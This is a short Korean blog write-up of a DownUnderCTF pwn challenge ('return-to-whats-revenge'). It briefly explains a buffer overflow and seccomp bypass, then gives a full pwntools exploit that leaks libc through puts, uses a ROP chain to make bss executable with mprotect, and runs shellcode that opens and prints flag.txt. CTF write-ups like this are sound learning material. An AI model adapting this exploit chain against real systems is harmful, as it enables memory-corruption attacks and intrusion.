seccomp, bof 문제이다.
mprotect를 사용해 bss 영역에 rwx 권한을 주고난 뒤 read 함수를 사용해 bss영역에 flag.txt를 open함수를 통해 열고 read , write를 해주는 쉘코드를 만들어 쓴 후 bss영역으로 RIP를 변조했다.
아래와 같은 코드를 작동시키면 문제가 해결된다.
from pwn import *
s = remote("chal.duc.tf",30006)
elf = ELF("./return-to-whats-revenge")
libc = ELF("./libc.so")
context.arch = 'amd64'
pay = b"A"*0x30
pay += b"B"*8
pay += p64(0x004019db)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
pay += p64(elf.symbols['main'])
s.sendlineafter("to?", pay)
s.recvline()
leak = u64(s.recv(6)+b"\x00"*2)
print("leak : " + hex(leak))
libc_base = leak - libc.symbols['puts']
print("libc_base : " + hex(libc_base))
write = libc_base + libc.symbols['write']
read = libc_base + libc.symbols['read']
mprotect = libc_base + libc.symbols['mprotect']
pop_rdi = libc_base + 0x00166a1c
pop_rsi = libc_base + 0x0015de66
pop_rdx = libc_base + 0x00001b9a
pay = b"A"*0x30
pay += b"B"*8
pay += p64(pop_rdi)
pay += p64(0x00404000)
pay += p64(pop_rsi)
pay += p64(0x2000)
pay += p64(pop_rdx)
pay += p64(7)
pay += p64(mprotect)
shellcode = ""
shellcode += shellcraft.open("./flag.txt")
shellcode += shellcraft.read("rax","rsp", 100)
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode = asm(shellcode)
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi)
pay += p64(0x00404050)
pay += p64(pop_rdx)
pay += p64(0x500)
pay += p64(read)
pay += p64(0x00404050)
s.sendlineafter("to?", pay)
s.sendline(shellcode)
s.interactive()| [darkctf] write-up (0) | 2020.09.28 |
|---|---|
| [33C3_2016] Babyfengshui (0) | 2019.12.06 |
| [0CTF_2018] Babystack (0) | 2019.12.03 |
| [CodeBlue_2017] Secret_mailer_service (0) | 2019.12.02 |
| [CodeBlue_2017] simple_memo_pad (0) | 2019.12.01 |